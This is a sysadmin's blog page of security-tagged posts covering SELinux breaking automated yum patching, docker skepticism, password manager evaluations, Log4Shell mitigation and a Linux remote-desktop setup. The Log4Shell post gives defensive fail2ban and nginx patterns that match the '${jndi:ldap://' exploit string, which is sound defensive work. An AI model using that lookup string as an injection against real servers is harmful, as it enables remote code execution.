Showing posts with label security. Show all posts
Showing posts with label security. Show all posts

Monday, 20 March 2023

SELinux sucks II

Previously I wrote about SELinux being bad for security on the grounds that it consumed too much of your time for little benefit. But I recently discovered it actively undermining the security on hosts I am responsible for.

The biggest wins for security are education and regular patching. So ensuring there is a patching mechanism is at the top of my list when building a new host. While the advice from NIST still reads like something written in the 1970s, NCSC and others endorse automated patching. I've not have any issues with Ubuntu/Debian across hundreds of machines running automated patching for several years - but I'm still cautious about how this is implemented. 

I recently inherited some Centos 7 boxes which did not have automatic patching. While there is a RHEL package yum-cron this is quite a history of issues. I would also need to break the packaged files to ensure that my live boxes did not update at the same time as the dev/test. I appreciate that delaying the updates to live might still mean a different patch set gets deployed than is on dev/test....but it is a risk which can be reduced. So I just added a simple cron job to run `yum -y update` logging its stdout and stderr. 

I thought all was good. Cron job was firing. Yum was happily reporting that there was nothing to do. Job done. What's next?

Only it was not working. 

Updates were available. They were not installed. Yum said "No packages marked for update".

Running an update via an interactive session worked fine.

The culprit? SELinux.

It took a bit of experimentation to find this. On a dev system, sitting idle (other than my ssh session) SELinux was generating so much noise that the default log rotation config only allowed for 40 minutes of history. Setting up a more frequent cron job I was able to capture failures in the audit.log. So yum was being blocked by SELinux but reporting no errors. In fairness, the absence of errors from yum was not the fault of SELinux....however yum is now produced/maintained by RedHat.

OK....so maybe there was a reason for installing yum-cron after all? So I installed that (I do find it surprising that it EXPECTS manual intervention before it will actually work). Configured it. And nothing. `yum list updates` says there are lots of packages to update. The cron job fires. Yum-cron writes no logs. No updates installed. I amended the yum-cron config to send an email when patching has been attempted - will monitor and see how it goes.

This was an interesting journey. In addition to the issues with RHEL yum-cron, I discovered that Centos yum-cron has issues all of its own.

So to summarize....

  • SELinux blocks yum run from cron
  • yum does not report failures
  • Centos yum-cron can't install security fixes only




Sunday, 25 September 2022

Why I'm (mostly) not using docker

I'm somewhat cautious of docker. Rather than reposting the same stuff on Reddit, I thought it would be quicker to list the reasons here and then just post the URL when it comes up.

I'm running a few hundred LXCs at $WORK. It's a really cheap way to provide a computing environment. And it works. But I'm more cautions about docker. Docker is not supported as a native container provider on Proxmox - which is where most of my VMs and LXCs now live - but that really has very little bearing on my concerns. I do have VMs running docker - more on that later.

The first problem is that its designed for running appliances. Some software fits very well into this model - but such software is usually edge case. For databases I do not want lots of layers of abstraction between the run time and the storage. For routers/firewall I want the interfaces to be under direct control of the host. For application and webservers I want to be able to interrogate memory and cpu usage on a per-process basis. Working on docker containers feels like key-hole surgery. It might be very hi-tech but its awkward and limiting. Conversely, I can have a (nearly) fully functional lxc host with very little overhead.

For a lot of people out there, the idea that you can just click a couple of links and have a service available for use sounds great. And it is. I've downloaded stuff from docker hub to try out myself. But I wouldn't run it in production. The stuff I do run in production has a well defined provenance - it has either come from the official debian/ubuntu repos or from the people who wrote the software. In the case of the latter, there are processes in place to check if the software needs updated. Conversely a docker container is built up of multiple layers, sourced from different teams/developers, most of whom are repackaging software written by someone else. In addition to the issue of sourcing software securely, the layers of packagers may also add capabilities to the container. It really might not be as isolated from the host as you think.

This lack of accountability is a growing concern - indeed Chainguard have released a Linux distribution specifically to address the problem. Wil it solve these problems? Its too early to tell.

So really the only sensible way to use docker in an enterprise environment is to build the images yourself. That demands additional work and high level of skill in another technology just to get the same result.

BTW - the docker images I've used to triall software and decided to take into production have been implemented as conventional installs on LXCs or VMs.

Tuesday, 12 April 2022

Password Manager 2

Having previously decided to try out Syspass, I must say I'm disappointed.

In terms of the broad design it gets a lot of things right. But the implementation is particularly poor and buggy. It is built as a single page application and if you accidentally hit the back button or close your window then its rather painful to get back to your session (at least as something you can interact with). Operations will randomly fail then succeed when re-invoked. The permissions/access model around the API make it unsuitable for integration with clients in most cases. And the browser plugin would not work at all for me.

I'm still using it just now - it's better than the spreadsheet it replaced. And I've gone to the trouble of writing scripts to very the passwords and export the data to Keepass

I was excited to learn of VaultWarden - and open source implementation of BitWarden. The current version would not compile on Ubuntu 20.04LTS (required newer version of Rust) so I tried out the docker version. The software has no support for user groups which would make policy management an enormous job.

Why is this so hard people!


Friday, 10 December 2021

CVE-2021-44228 log4j RCE mitigation

 "This seems to be generating some buzz" - a passing comment in $WORK's chat app - promoted me to go look at this in a bit more detail. As a systems admin, I generally let the devs guy worry about the health of the applications while I deal with the infrastructure, but this one is bad. Real bad. Like Corona virus for Java application servers. It even came from China (but kudos to the AliBaba guys for letting everyone know - this could have gone very differently).

I've never been able to work on Java developer timescales - and I didn't think this vulnerability would let me. So...

Fail2ban

I've got a small cluster of proxies fronting the web and application servers. These have fail2ban running which does a good job of keeping the script-kiddies out (really - I needed to put in a bypass for the company we subcontract the pen-testing to). So first off was a fail2ban rule:

#
[Definition]

failregex =     ^<HOST>.*\"\${jndi:ldap://
ignoreregex =


But fail2ban reads the log files to get its input. The log files don't get written until the request is processed. It won't catch the first hit.

Containment

The exploit works by retrieving a malware payload from an LDAP server. So the next step I took was to add firewall rules preventing our application servers from connecting to ports 389 and 636 other than our whielisted internal LDAP servers. 

Of course that's only going to help when the attacker is using an LDAP server running on the default ports. Bit it was worth doing. We were already getting attempts to exploit out servers, but they were crude / badly targeted. Until 14 minutes after I rolled out the firewall change. When we got hit by a request which would have triggered a successful exploit.

Prevention

The best mitigation (apart from applying the patch) is to set the "formatMsgNoLookups=true" option (hint for non-Java people out there - add this on the Java command line prefixed with "-D"). However according to the documentation I could find this only works on some version of log4j / it is far from clear just now if those versions are a sub-set or a superset of the versions which are vulnerable to the exploit, and I did not have time to go find out.
 
It seems obvious now, but there is a better way of protecting the systems. The proxy cluster uses nginx, so I went on to add this in the config:

if ($http_user_agent ~* \{jndi: ) {
        return 400 ;
}
if ($http_x_api_version ~*  \{jndi: ) {
        return 400 ;
}

(note that the second statement may have a functional impact).

I don't know if I've covered the entire attack surface with this, but now I get to go to bed and our servers live for another day.

Sunday, 10 January 2021

Password Manager

I recently chose Syspass to use as a repository for storing passwords. Since there is something of a dearth of in-depth reviews of Open-Source software, I thought I should redress that imbalance by explaining why here.

 

The Problem

From 2017-2018 I was working as a CyberArk administrator. CyberArk is a privileged access management tool – it stores passwords, implements password management (verifying, rotating, generating, synchronizing) and allows users to access to a session without having access to the password. It also provides reporting on state and usage.

CyberArk is really well designed and put together.

But it is very expensive.

When I started a new job with a different employer in 2018, pretty much the only handover I got was a spreadsheet full of passwords. As you might imagine, there were a lot of things higher on my priority list to get the datacenter under control than where passwords were stored. But eventually it came back to the top of my list.

 

The Requirements

Users

We've gone from 1 admin person to 3 in a very short time – but I don't expect the team to expand much more. However I was keen to have a platform which could be shared securely with the development teams and potentially the wider business. That implied a user-interface – meaning not just some GUI front end, but a multi-user authentication and authorization capability.

Password Management

With several hundred hosts, the propsect of using unique passwords or ever changing them seems to have been too much of a challenge for my predecessors. A critical requirement was that the new system support some means of changing passwords. Having seen from my work with CyberArk that this is not quite as simple as it sounds, the requirement here was that the system provide a usable API for retrieving, verifying and updating passwords.

Secret Management

In 2020, passwords are not the only secrets that need to be stored/deployed securely – there are also access tokens and encryption keys.

Security CIA

Confidentiality, Integrity and Availability are the magic properties of Security. A password manager contains your security cron-jewels and so should be subject to very exacting standards of these attributes. Confidentiality entails a robust mechanism for encrypting and protecting data. Integrity is partially addressed by the Password Management requirements above, but along with Availaiblity requires a backup/restore mechanism in place which works when the rest of your infrastructure is severely impaired. 2020 has seen major outages on AWS, Google and Azure – outsourcing that responsibility is not a realistic option.

 

The Products

Some of the products I looked at in my search were Passbolt, Lastpass, Bitwarden (inc Bitwarden RS), Hashicorp Vault, TeamPass, Passit, GoPass.

An honourable mention here goes to Hashicorp Vault – it is all about the API and machine-to-machine communication. Indeed, the base distribution only has a CLI for user interaction. While there are web front ends, these only expose limited functionality and are geared more towards data maintenance than providing humans with access to secrets. It is also notable for quorum based master key injection at system start-up.

I found the others to be very lacking in their encryption, management of the master key (where one was used) or the functionality/documentation of their APIs.

While Bitwarden has a good user interface (including browser plugins for web application authentication) the API is poorly documented and the authentication process is byzantinely complicated.

 

Syspass

This runs on my favourite platform: Linux, PHP and MySQL.

Notable features

The web front end allows a single click to copy data to the clipboard (something CyberArk struggles with out of the box).

It not only provides a web-pased API but also publishes data on how to augment thebehaviour of the server with plugins.

It can provide user authentication via its native user database or via LDAP (including MS Active Directory). Since the user's password is also the decryption key for the user's copy of the master password, that entails a resynchronization process if the password is changed – that is catered for by the use of a temporary, time-limited token. However I have not yet got LDAP integration working with my ancient and somewhat misconfigured OpenLDAP service.

It provides 2 factor authentication.

Missing

If I were designing a password manager myself, I would definitely be building it as a PHAR to take advantage of the code signing mechanisms available to PHP. Syspass is not available as a PHAR, and would need significant reworking to package it as such (the install process writes the config to PHP code files). But in fairness I have not come across any password manager available as a PHAR.

Although it has a browser plugin, I've yet to get this working as intended. Also the plugin relies on the API authentication mechanism – which seems cumbersome (see below). On both Chrome (v87) and Firefox (v84) it refuses to save the configuration.

While the web interface uses Ajax (with JSON resonses) extensively to interact with the server, it uses a different end-point than the the documented API.

The documented API is intended for machine-to-machine communication. It uses a simple system of access tokens (although there is mention of HTTP Basic authentication in the manual – https://syspass-doc.readthedocs.io/en/3.0/application/authorization.html). However rather than creating a machine account, it is necessary to provision individual permissions which are aggregated by an account name and a password. Managing a complex system with a lot of clients will be difficult.

 

Project status

As yet, I'm not completely committed to Syspass, and it still needs a lot of work before it will be ready for production. I have started looking at the Backup/DR model and think the best solution will be to export the data into an encrypted KeePass database. The first installment of the code for that is published on GitHub: https://github.com/symcbean/kpx-writer-php 

I will be publishing further updates in the coming months. 


Update

Saturday, 4 April 2020

Security tools are awful

In my experience, most bolt on security products actually undermine your security at great expense rather than enhance it. One exception to this is a good password manager. Recently I've been trying to find one for my workplace. Unfortunately I have nothing like the budget need for CyberArk - in my last job, I looked after my employers CyberArk installation and really loved it (despite the fact that most of it only ran on MS-Windows). If you have money to burn - read no further - go buy CyberArk and don't skimp on getting it configured correctly.

My starting point was open source team password managers - there's lots to choose from: Syspass, Teampass, Passbolt, Passit, Psono, bitwarden....the list goes on and on.

The first issue I came across is the way they handle the master encryption key. If you are running this on your own infrastructure then that might not matter too much. But few people do still run their own infrastructure, and of those that do, the passwords for your infrastructure are the last thing anyone would want to store on their own infrastructure! Almost all are really, really bad at this. A surprising number of projects try to pass off pen tests against the application as security audits - probably because 1) pen tests are now relatively cheap and 2) they know their emperor has no clothes.

The second issue is the lack of a usable API. I don't just want to store passwords, I want to install other secrets. I don't want to have to copy and paste every time my infrastructure needs a secret. I want to be able to rotate passwords. I don't even mind that your application does not do this - if I can make sense of the API I can easily implement this myself.

Most of them have APIs - but are lacking in documentation. PassBolt is offered as a commercial product / service as well as open source and proudly provides documentation on the end points - but is somewhat lacking in detail about access authentication tokens. I was therefore quite hopeful that they would be able to point me in the right direction, but after contacting their support, they were not able to provide a single example of a client or explain how their authentication worked!

I was excited when I discovered that Passit ran as a single page application - surely that must mean its a REST API? But when I tried using it I saw no data traffic in web developer - WTF? I can only guess that its using websockets to communicate.

The third issue is devops syndrome. Yes, you can install their open source product, but only after you build out the same set of orchestration and build tools that they use. Just run this simple command.....after you have installed node.js, docker, kubernetes, ansible, jenkins.....  


Wednesday, 18 March 2020

COVID19 - Provisioning remote access with Linux


When I started in my current role, they were using a conventional Cisco IPSEC based vpn. While with a few config tweaks it worked, it was from ideal for security or user experience. The big security issue is that it creates a big hole in your firewall – from a device bridged to the internet! A further concern was that authentication was via a password. While I could have put in a RADIUS server with a MFA authentication source, this still required users to either:
  • take their work computer (and all the data stored on their local disk) off site
  • install and configure some very esoteric software on their own hardware

Fixing all these problems would take massive amounts of efforts to provide a very limited service with continuing security problems.

If everything they need is on their computer in work – then I just need to find a way of providing access to their computer at work remotely. So here are the ingredients for the recipe I used:

All the above, with the exception of the free certificate, are open-source and available from official Ubuntu repos (this software is also available for other Linux and BSD systems). In addition I wrote custom scripts to
  • provision users (with QR codes for Google auth)
  • run wakeonlan and rdesktop
  • collect activity stats
Now all a user needs to get connected is a mobile device running an authenticator application and an internet connected browser.
Once they get their head around the fact that they don't need to be sitting in front of the computer they are using, the users are very happy with the experience. We have fewer reports of issues than we do from the legacy VPN users. The 2-factor authentication provides much better security.

The only difficult bit was stripping out the full “desktop experience” from Openbox. I don't want my users shutting down the machine or mapping drives! Initially I tried xfreerdp as the RDP client but had a lot of issues with keyboard mapping. As hinted at above, the machine is heavily locked down – users have no shell on the loca machine. This was easy to implement but impacted on the behaviour of some terminal emulators (required for onward ssh access). Openbox and systemd don't play nice together – so running “last” reports all users have “gone away”. This seems to be yet another systemd issue. However I get more useful usage monitoring from the script to collect activity stats (this finds openbox processes and interrogates /proc to find the user, display and other information). It would be trivial to add in screen captures here – but decided to leave this out for now. Its also possible for additional users to join a VNC session, but this is currently blocked on the firewall until I think up a way of handling it which does not reduce the overall security.

The version of noVNC installed from repo is rather old, and the current client (i.e. the html and javascript parts) have a lot of improvements - I downloaded these files from github and copied them over the repo install.

I chose tigervnc as, although all the vncservers support multi-head usage on Linux, the package version of this seemed closest to my usage model.

Currently this is running on a 2 core virtual machine. The initial 2Gb of RAM was all but used up with 17 users online and this has since been changed to 8Gb. The 2CPUs is overkill – with 20 users working online, the load was around 0.3 and bandwidth was averaging 200kbps with a peak of 500kbps.

Out of curiosity I looked up what Microsoft say you need for an RDS server. A comparison with what I am currently running is shown below:



Microsoft recommendMy server uses
Base OS2Gb250Mb
RAM Per user64Mb100Mb
CPU Per user0.060.015
B/W Per user64kbps25kbps

So in terms of the hardware resources there's not a clear winner – however having worked in an environment which used Microsoft RDS extensively, supporting the Linux system is a lot cheaper in terms of manpower. And that's before considering the costs of licensing the Microsoft solution and implementing 2FA.

Some more details in a later post.